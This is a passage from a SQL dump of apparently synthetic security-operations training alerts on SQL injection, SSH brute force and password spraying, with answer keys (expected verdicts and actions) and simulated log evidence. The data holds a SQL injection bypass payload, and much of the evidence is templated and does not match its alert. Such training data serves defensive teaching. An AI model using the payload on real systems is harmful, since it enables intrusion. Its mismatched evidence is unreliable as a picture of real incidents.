3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.934Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.45\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"user2\\\",\\\"hostname\\\":\\\"web-app\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1667, 'Web Portal Access Attempt with SQL Injection', 'critical', 'Splunk', 'Detected SQL injection attempt in the request body targeting the internal web portal.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.0.2.45\",\"dst_ip\":\"10.0.0.15\",\"username\":\"none\",\"hostname\":\"web-portal\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP identified in multiple web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The malicious payload and attack signature confirm the SQL injection attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.935Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.45\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1668, 'SSH Brute Force from Known Bad IP', 'critical', 'Azure Sentinel', 'SSH brute force detected from a high-reputation malicious IP targeting critical infrastructure.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:20:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"10.0.0.20\",\"username\":\"admin\",\"hostname\":\"infrastructure-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username in brute force attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The malicious history of the IP supports the detection of a true positive brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.936Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"infrastructure-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.936Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"infrastructure-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.936Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"infrastructure-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.936Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"infrastructure-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.936Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:20:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"infrastructure-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1669, 'Password Spraying Attempt on Corporate Web Portal', 'high', 'Splunk', 'Detected a series of failed login attempts from a single IP address against multiple user accounts on the web portal.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:30:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.0.2.55\",\"dst_ip\":\"192.168.1.25\",\"username\":\"user3\",\"hostname\":\"corporate-portal\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP frequently involved in password spraying\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The malicious IP reputation and pattern of login attempts confirm the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.938Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:30:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.55\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"user3\\\",\\\"hostname\\\":\\\"corporate-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.938Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:30:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.55\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"user3\\\",\\\"hostname\\\":\\\"corporate-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.938Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:30:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.55\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"user3\\\",\\\"hostname\\\":\\\"corporate-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.938Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:30:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.55\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"user3\\\",\\\"hostname\\\":\\\"corporate-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.938Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:30:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.0.2.55\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"user3\\\",\\\"hostname\\\":\\\"corporate-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1670, 'Multiple Failed SSH Logins from Suspicious IP', 'medium', 'Elastic SIEM', 'A suspicious IP address was observed making multiple failed SSH login attempts, resembling a brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T16:40:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.120\",\"dst_ip\":\"10.0.0.30\",\"username\":\"admin\",\"hostname\":\"server1\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.120\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for SSH brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username in brute force attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP\'s history of malicious activity confirms the attack as a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.940Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:40:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"10.0.0.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.940Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:40:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"10.0.0.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.940Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:40:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"10.0.0.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.940Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:40:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"10.0.0.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.940Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T16:40:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.120\\\",\\\"dst_ip\\\":\\\"10.0.0.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server1\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1671, 'Suspicious Login Attempts Detected on Internal Network', 'medium', 'Wazuh', 'Detected multiple login failures from an external IP targeting internal resources, indicating a potential password spraying attack.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T17:15:50Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.66\",\"dst_ip\":\"192.168.1.35\",\"username\":\"employee\",\"hostname\":\"internal-portal\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.66\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for frequent login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"employee\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP\'s OSINT result confirms it as a malicious source, justifying the alert.\"}', 'Beginner', 'SIEM', 3, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.941Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.66\\\",\\\"dst_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"employee\\\",\\\"hostname\\\":\\\"internal-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.941Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.66\\\",\\\"dst_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"employee\\\",\\\"hostname\\\":\\\"internal-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.941Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.66\\\",\\\"dst_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"employee\\\",\\\"hostname\\\":\\\"internal-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.941Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.66\\\",\\\"dst_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"employee\\\",\\\"hostname\\\":\\\"internal-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.941Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T17:15:50Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.66\\\",\\\"dst_ip\\\":\\\"192.168.1.35\\\",\\\"username\\\":\\\"employee\\\",\\\"hostname\\\":\\\"internal-portal\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1672, 'Password Spraying Attack Against Internal Web Portal', 'high', 'Azure Sentinel', 'Detected a high number of failed login attempts from a single IP address across multiple user accounts.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:30:20Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.130\",\"dst_ip\":\"10.0.0.40\",\"username\":\"user4\",\"hostname\":\"internal-web\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.130\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP engaged in password spraying\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"user4\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The malicious activity and OSINT results confirm the password spraying attack.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.943Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T18:30:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.130\\\",\\\"dst_ip\\\":\\\"10.0.0.40\\\",\\\"username\\\":\\\"user4\\\",\\\"hostname\\\":\\\"internal-web\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.943Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 